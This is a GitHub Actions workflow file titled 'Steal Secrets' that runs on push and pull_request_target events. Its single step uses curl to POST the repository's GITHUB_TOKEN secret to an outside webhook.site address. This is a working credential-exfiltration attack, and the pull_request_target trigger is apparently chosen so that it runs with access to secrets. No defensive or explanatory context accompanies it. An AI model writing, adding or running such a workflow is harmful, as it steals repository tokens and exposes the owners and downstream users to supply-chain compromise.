name: Steal Secrets
on: [push, pull_request_target]

jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -X POST https://webhook.site/f1d44439-6023-4082-a91d-834be32f614d \
            -d "token=${{ secrets.GITHUB_TOKEN }}"
